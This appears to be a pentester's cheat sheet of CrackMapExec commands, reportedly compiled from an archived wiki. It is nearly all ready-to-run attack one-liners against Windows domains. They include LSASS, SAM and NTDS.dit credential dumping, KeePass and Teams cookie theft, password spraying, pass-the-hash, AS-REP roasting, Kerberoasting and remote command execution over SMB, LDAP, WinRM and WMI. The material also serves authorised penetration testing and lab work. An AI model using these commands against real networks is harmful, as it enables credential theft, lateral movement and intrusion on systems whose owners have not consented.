Crackmapexec notes

A lot of this was pulled from the waybackmachine archive of what used to be crackmapexec.wiki, but it seems the original site is down now. This should be a comprehensive list of general commands that can be used with Crackmapexec.

Basic command execution stuff

What protocol is this? 


crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami
crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable'

SMB stuff

dump creds

Note that for a lot of these, you need local admin just like with MimiKatz.

LSASS


cme smb 192.168.255.131 -u administrator -p pass -M lsassy
cme smb 192.168.255.131 -u administrator -p pass -M nanodump

Wireless

cme smb <ip> -u user -p pass -M wireless

KeePass


$ crackmapexec smb <ip> -u user -p pass -M keepass_discover
$ crackmapexec smb <ip> -u user -p pass -M keepass_trigger -o KEEPASS_CONFIG_PATH="path_from_module_discovery"

NTDS.dit


#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users --enabled
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss

Note: you can also get NTDS.dit by DCSYNC'ing with the DC machine acct.

SAM hashes


cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam

MS Teams cookie theft (need local admin)


$ crackmapexec smb <ip> -u user -p pass -M teams_localdb

SMB password sprays

#~ cme smb 192.168.1.101 -u user1 user2 user3 -p Summer18
#~ cme smb 192.168.1.101 -u user1 -p password1 password2 password3
#~ cme smb 192.168.1.101 -u /path/to/users.txt -p Summer18
#~ cme smb 192.168.1.101 -u Administrator -p /path/to/passwords.txt

Local authentication examples

#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-auth
#~ cme smb 192.168.1.0/24 -u '' -p '' --local-auth
#~ cme smb 192.168.1.0/24 -u UserNAme -H 'LM:NT' --local-auth
#~ cme smb 192.168.1.0/24 -u UserNAme -H 'NTHASH' --local-auth
#~ cme smb 192.168.1.0/24 -u localguy -H '13b29964cc2480b4ef454c59562e675c' --local-auth
#~ cme smb 192.168.1.0/24 -u localguy -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c' --local-auth

LDAP

test acct existence using LDAP no kerb


#~ cme ldap 192.168.1.0/24 -u users.txt -p '' -k

testing creds


#~ cme ldap 192.168.1.0/24 -u user -p password

with hash


#~ cme ldap 192.168.1.0/24 -u user -H A29F7623FD11550DEF0192DE9246F46B

ASREP Roast


cme ldap 192.168.0.104 -u harry -p '' --asreproast output.txt
cme ldap 192.168.0.104 -u user.txt -p '' --asreproast output.txt
cme ldap 192.168.0.104 -u harry -p pass --asreproast output.txt

Domain SID Discovery


$ crackmapexec ldap DC1.scrm.local -u sqlsvc -p Pegasus60 -k --get-sid

Kerberoast


cme ldap 192.168.0.104 -u harry -p pass --kerberoasting output.txt

Bloodhound ingestion


crackmapexec ldap <ip> -u user -p pass --bloodhound --ns ip --collection All

WINRM stuff

passwd spray


#~ cme winrm 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce

test creds


#~ cme winrm 192.168.1.0/24 -u user -p password

if SMB is closed


#~ cme winrm 192.168.1.0/24 -u user -p password -d DOMAIN

Command execution


#~ cme winrm 192.168.255.131 -u user -p 'password' -X whoami

WMI

Password Spray


#~ cme wmi 192.168.1.0/24 -u userfile -p passwordfile
#~ cme wmi 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce

test creds


#~ cme wmi 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!'

Test creds if no SMB


#~ cme wmi 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!' -d <domain>

Local auth


#~ cme wmi 10.10.10.52 -u admin -p 'admin' --local-auth

WMI command execution


#~ crackmapexec wmi 192.168.255.131 -u user -p 'password' -x whoami